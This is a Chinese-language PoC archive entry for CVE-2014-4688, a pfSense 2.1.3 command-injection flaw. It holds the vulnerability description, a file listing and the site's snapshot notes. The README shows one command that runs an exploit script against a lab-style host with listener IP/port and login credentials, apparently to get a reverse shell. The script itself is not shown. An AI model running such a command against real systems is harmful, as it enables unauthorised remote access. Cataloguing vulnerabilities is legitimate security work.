关联漏洞
标题:
Electric Sheep Fencing pfSense 安全漏洞
(CVE-2014-4688)
描述:Electric Sheep Fencing pfsense是美国Electric Sheep Fencing公司的一套免费开源的基于FreeBSD的防火墙和路由器软件。 Electric Sheep Fencing pfSense 2.1.3及之前的版本中存在安全漏洞,该漏洞源于diag_dns.php脚本没有正确验证hostname值,diag_smart.php脚本没有正确验证smartmonemail值,status_rrd_graph_img.php脚本没有正确验证database值。远程攻击者
介绍
# CVE-2014-4688
```
python3 pfsense.py --rhost 10.10.10.60 --lhost 10.10.14.2 --lport 9999 --username rohit --password pfsense
```
文件快照
[4.0K] /data/pocs/36f9aacb00b086fb501a4f173d400a7f9ed3cae6
├── [3.4K] pfsense.py
└── [ 132] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。